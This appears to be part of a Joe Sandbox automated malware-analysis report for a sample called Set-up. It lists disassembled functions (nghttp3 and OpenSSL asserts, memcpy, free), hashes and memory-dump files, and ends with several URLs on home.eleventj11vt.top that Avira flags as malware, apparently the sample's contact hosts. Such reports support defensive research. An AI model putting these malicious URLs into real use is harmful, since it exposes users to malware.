Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: 48d11f5e1e155265955c5e487f8c7223fff71b46c8d8a90dc4661f10fb8ab598
Instruction ID: d1125c05492ad48f18accd6a7c5d200e5e3fdb7e5bff3c54eeb95debf3e11949
Opcode Fuzzy Hash: 48d11f5e1e155265955c5e487f8c7223fff71b46c8d8a90dc4661f10fb8ab598
Instruction Fuzzy Hash: 4B51C775A043048FD7049F28D884B6ABBD6FF88314F09467CEC999B392EA34DD45CB91

Function 005B45C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 005B468C

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B4687
nghttp3_conn.c, xrefs: 005B4682

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 84bcc6f2c53d40da1f3253b298798ea516348f05562a0894cc7f199666e3f4c4
Instruction ID: a8316fcf0a86546f40b49940715bdde1149419b4217e7f72fab56764fb901b8c
Opcode Fuzzy Hash: 84bcc6f2c53d40da1f3253b298798ea516348f05562a0894cc7f199666e3f4c4
Instruction Fuzzy Hash: AF3193716006056FD7209E25EC85EEBBBD8FFC6365F040529F95897242E731E914CBA1

Function 005B4400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 005B44B7

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B44B2
nghttp3_conn.c, xrefs: 005B44AD

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 1623e2a3d8693c014414c859f5610b58901ec8ecedb7bc331785469c04ef7d2a
Instruction ID: fc0d9ec5fcfd6679f9d2e4db83aa6aa699d3bb10e09eb56cf0c092bfeceed01b
Opcode Fuzzy Hash: 1623e2a3d8693c014414c859f5610b58901ec8ecedb7bc331785469c04ef7d2a
Instruction Fuzzy Hash: 4221B072100606AFEB215E65DC45FE77BDAAFC5355F040868FA18C6163EB36E4248B61

Function 0088A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0088A161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0088A2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0088A3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0088A499

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cf525fe6afac1eae239d79181103841a7de669cf97ed5479700b5a11f7f0c943
Instruction ID: 4ea0cf3890bc3b4e0d0a6866fb8a279fdee7c2706c55ac7d84f20afa87660032
Opcode Fuzzy Hash: cf525fe6afac1eae239d79181103841a7de669cf97ed5479700b5a11f7f0c943
Instruction Fuzzy Hash: 8AC19F716042109FDB18EF28C888A6A7BE5FF88314F19456EF949CB396D771EC40CB86

Function 005B6140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0058D7A7,?,?,0058D7A7), ref: 005B61CF

Strings

i < len || offset == 0, xrefs: 005B61CA
nghttp3_stream.c, xrefs: 005B61C5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: cfb83cd7ecdf1482ebf8bf2db5c4819406d8792f2e5f913de5a3b441f0ac3e2c
Instruction ID: 0b488928955fdb7d3d91967bb35a48b8f1e5adaf3f351d1283e4a03d0a466bed
Opcode Fuzzy Hash: cfb83cd7ecdf1482ebf8bf2db5c4819406d8792f2e5f913de5a3b441f0ac3e2c
Instruction Fuzzy Hash: 01115B755043048FD304EF29D889FFA7BE8FB88320F0A04BDE94947362DA346985CB91

Function 005B8700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,005B88D3,00000010,?,?,00000000,005B9AE3,005BACDD,-00000010,?,?,?,00000000,?), ref: 005B873C

Strings

(blklen & 0xfu) == 0, xrefs: 005B8737
nghttp3_balloc.c, xrefs: 005B8732

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: f5111d01d1ca7bbf9621ba4c9c0339ed5d76c8261a08f1c7a01a406691522cce
Instruction ID: ff3ee164220fc6dce7f3ff5f87a8190912147d44bd4ba20a19b273ae585a69fd
Opcode Fuzzy Hash: f5111d01d1ca7bbf9621ba4c9c0339ed5d76c8261a08f1c7a01a406691522cce
Instruction Fuzzy Hash: 4711C8796493415FC3119F14DC05BA6BFB5FF86708F1984D9E8489B2A3DA30AC44C751

Function 005B89F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,005B5084,?,?), ref: 005B8A31

Strings

nghttp3_get_varint, xrefs: 005B8A4C
nghttp3_conv.c, xrefs: 005B8A53

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _byteswap_uint64
String ID: nghttp3_conv.c$nghttp3_get_varint
API String ID: 1624361598-912089391
Opcode ID: 0ee672e407ada923cd3b8cb99df2856be31c9aa9a357cc8e7702cf98e347dd72
Instruction ID: d464b5cba61cf158191fc29da8be96fd1dbc19a72f7df543ce992c2d08c99a89
Opcode Fuzzy Hash: 0ee672e407ada923cd3b8cb99df2856be31c9aa9a357cc8e7702cf98e347dd72
Instruction Fuzzy Hash: FEF0F6B1550042A7D704AF34D801578BBE2EB82712F8C86E1F495DB1D4CB74C991E711

Function 0053C1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 0053C1E5
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0053C1F4

Strings

\/@, xrefs: 0053C1DF

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlenstrpbrk
String ID: \/@
API String ID: 3089284949-4263999291
Opcode ID: 004df21259c83799ec1ec27d0c82f5336ef7ad1b93ca1d540161466ab1d76af6
Instruction ID: c92052460f23c430d51c4a8d365f979910863fd23d131c740bb78a6ea6b3c25d
Opcode Fuzzy Hash: 004df21259c83799ec1ec27d0c82f5336ef7ad1b93ca1d540161466ab1d76af6
Instruction Fuzzy Hash: 92E08693A0452125DA2130BCBC01BBF5B55A7C2B71F1D0667F595E2204F52188414392

Function 005B0300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,005C0B2D,5308C483,00000000,005B4D9F,?,005B0EC8), ref: 005B0333

Strings

nghttp3_rcbuf.c, xrefs: 005B0329
rcbuf->ref > 0, xrefs: 005B032E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: 5da0921131bba99eda3d203bf15aea0b47f614c2d1a1057f0ea3d51a187e49e2
Instruction ID: b35f589fd0e5aa852e7ae39c12185756f685aeab1844d645991bca0b4470558d
Opcode Fuzzy Hash: 5da0921131bba99eda3d203bf15aea0b47f614c2d1a1057f0ea3d51a187e49e2
Instruction Fuzzy Hash: 9EE03038200600DFCA149B14D949AA67BE1BF89712F98D5D8F409872E1D731EC01DA00

Function 006EA170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 006E9F60: GetStdHandle.KERNEL32(000000F4), ref: 006E9F76
Part of subcall function 006E9F60: GetFileType.KERNEL32(00000000), ref: 006E9F83
Part of subcall function 006E9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 006E9FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,006ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,006EDF70,?,?,?,?,?,?,?,00000000), ref: 006EA18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,006ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,006EDF70,?,?,?,?,?,?,?), ref: 006EA195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 006EA17C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: 9e92bd491b4b5b1db53dbf445835fcef67359cd9d53479178039c936cb3714ca
Instruction ID: 1085cd69f51706c9e39fa9edda420083ad8c0e5b3a5270bff2ba95b3d4c1b6cc
Opcode Fuzzy Hash: 9e92bd491b4b5b1db53dbf445835fcef67359cd9d53479178039c936cb3714ca
Instruction Fuzzy Hash: 28C012B2945346EBEF027E944C03E2AB565BF66700F0C1C1CB254950E7DA639534A657

Function 00894230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 0089427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894290

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1c6367711893e6fffc3a0eeba61e92c18efe96a74ad6c62a17d328a124d5e163
Instruction ID: 17ad85b9995e6f150ed9e69a08e75a08eb7b6be8c9044d4c18ccfd7a48c9e7e8
Opcode Fuzzy Hash: 1c6367711893e6fffc3a0eeba61e92c18efe96a74ad6c62a17d328a124d5e163
Instruction Fuzzy Hash: 7601AD76A001018FEE20BB98E841D1BB7D5FF91324B0E8479E449CBA62DA30EC44CF82

Function 00882810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0086D8A5,?), ref: 0088281B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882826
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882831
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0088283A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: aee7b1ccd72c793c567d065547f1387730e766c64228b715f4008fea97cacd34
Instruction ID: 2f5809356e16579729465ae3c578f28afc98ce7beb6cdd2781ef12a75cbb102b
Opcode Fuzzy Hash: aee7b1ccd72c793c567d065547f1387730e766c64228b715f4008fea97cacd34
Instruction Fuzzy Hash: 2FD012B6C0551197FD123A14BC0244B7690FF61338F0C0434F845E3E66EA12AD2599C3

Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olN	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	Avira URL Cloud: Label: malware

